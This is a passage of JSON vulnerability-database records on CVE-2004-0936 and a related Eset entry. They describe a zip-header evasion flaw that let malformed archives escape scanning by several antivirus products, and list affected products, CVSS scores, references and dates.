{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:archive_zip:archive_zip:1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0936",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9366",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0936",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#968818",
"trust": 0.8,
"value": "7.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-300",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9366",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RAV antivirus allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. RAV is an antivirus software. Due to a problem with the processing of zip files in RAV, zip files can bypass antivirus detection",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9366"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9366",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9366"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2004-0936",
"trust": 2.0
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9366",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"id": "VAR-200501-0012",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9366"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:29.128000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RAV AntiVirus zip Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146862"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0936"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/968818"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9366"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-12-10T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9366"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9366"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anti-virus software may not properly scan malformed zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
],
"trust": 0.6
}
}
VAR-200501-0311
Vulnerability from variot - Updated: 2023-12-18 12:40Eset Anti-Virus before 1.020 (16th September 2004) allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Eset Anti-Virus is an anti-virus software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0311",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.0"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
